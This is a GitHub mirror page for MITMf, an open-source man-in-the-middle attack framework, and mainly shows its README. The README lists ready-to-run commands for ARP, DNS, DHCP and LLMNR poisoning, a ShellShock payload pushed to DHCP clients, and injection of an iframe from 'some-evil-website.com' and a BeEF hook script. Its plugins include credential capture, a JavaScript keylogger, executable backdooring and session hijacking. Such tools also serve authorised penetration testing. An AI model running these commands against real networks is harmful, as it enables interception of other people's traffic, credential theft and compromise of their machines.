github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-12 16:13:59 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions
Framework for Man-In-The-Middle attacks
350 commits 2 branches 10 tags 1.6 MiB
Find a file
byt3bl33d3r fd9b79c617 first pass at refactoring: 
directory structure has been simplified by grouping all the poisoners and servers in one folder
impacket smb server has been replaced with responder's
flask http server has beem replaced with responder's
modified config file to support new changes
2015-08-02 21:15:10 +02:00
config first pass at refactoring: 2015-08-02 21:15:10 +02:00
core first pass at refactoring: 2015-08-02 21:15:10 +02:00
libs This is a vewwwy big commit 2015-07-18 20:14:07 +02:00
logs fixed .gitignore 2015-05-19 00:45:27 +02:00
plugins first pass at refactoring: 2015-08-02 21:15:10 +02:00
tools This commit refactors ARP and DHCP poisoning: 2015-07-25 02:49:41 +02:00
.gitignore updated requirements.txt, changed imports to mitmflib 2015-06-11 22:05:22 +02:00
.gitmodules This is 1/2 of the work done... lot's of cool stuff! 2015-04-27 18:33:55 +02:00
CHANGELOG.md added code climate, modified readme 2015-07-27 21:54:45 +02:00
CONTRIBUTING.md moved the FAQ to CONTRIBUTING.md 2015-07-28 04:40:40 +02:00
CONTRIBUTORS.md Added Responder to CONTRIBUTORS 2015-07-26 14:17:21 +02:00
LICENSE Initial commit 2014-07-07 13:13:51 +02:00
lock.ico updated lock icon 2015-07-28 11:46:52 +02:00
mitmf.py first pass at refactoring: 2015-08-02 21:15:10 +02:00
README.md modified intall intructions 2015-07-28 19:45:12 +02:00
requirements.txt This commit adds active packet filtering/modification to the framework (replicates etterfilter functionality) 2015-07-27 20:44:23 +02:00
setup.sh This commit adds active packet filtering/modification to the framework (replicates etterfilter functionality) 2015-07-27 20:44:23 +02:00

README.md

Supported Python versions Latest Version Supported OS Code Climate

#MITMf

Framework for Man-In-The-Middle attacks

Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io

This tool is based on sergio-proxy and is an attempt to revive and update the project.

Contact me at:

Before submitting issues, please read the CONTRIBUTING.md.

Description

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.

Features

  • The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.

  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.

  • The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.

  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.

  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)

For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:

if packet.haslayer(ICMP):
	log.info('Got an ICMP packet!')
	packet.dst = '192.168.1.0'
  • Use the packet variable to access the packet in a Scapy compatible format
  • Use the data variable to access the raw packet data

Now to use the filter all we need to do is: python mitmf.py -F ~/filter.py

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else ;)

Note: you can modify filters on-the-fly without restarting MITMf!

Examples

The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:

python mitmf.py -i enp3s0

ARP poison the whole subnet with the gateway at 192.168.1.1 using the Spoof plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

Same as above + a WPAD rogue proxy server using the Responder plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

Enable LLMNR/NBTNS/MDNS spoofing:

python mitmf.py -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

Inject a JS script:

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)

For a complete list of available options, just run python mitmf.py --help

#Currently available plugins

  • HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
  • SMBTrap : Exploits the 'SMB Trap' vulnerability on connected clients
  • ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
  • Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ : Partially bypass HSTS
  • Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
  • BeEFAutorun : Autoruns BeEF modules based on a client's OS or browser type
  • AppCachePoison : Performs HTML5 App-Cache poisoning attacks
  • Ferret-NG : Transperently hijacks client sessions
  • BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
  • FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject : Inject arbitrary content into HTML content
  • BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
  • JSkeylogger : Injects a Javascript keylogger into a client's webpages
  • Replace : Replace arbitary content in HTML content
  • SMBAuth : Evoke SMB challenge-response authentication attempts
  • Upsidedownternet : Flips images 180 degrees

How to install on Kali

apt-get install mitmf

Currently Kali has a very old version of MITMf in its repos, read the Installation section to get the latest version

Installation

  • Clone this repository
  • Run the setup.sh script
  • On Kali, Debian (and possibly Ubuntu): apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev
  • Run the command pip install --upgrade -r requirements.txt to install all Python dependencies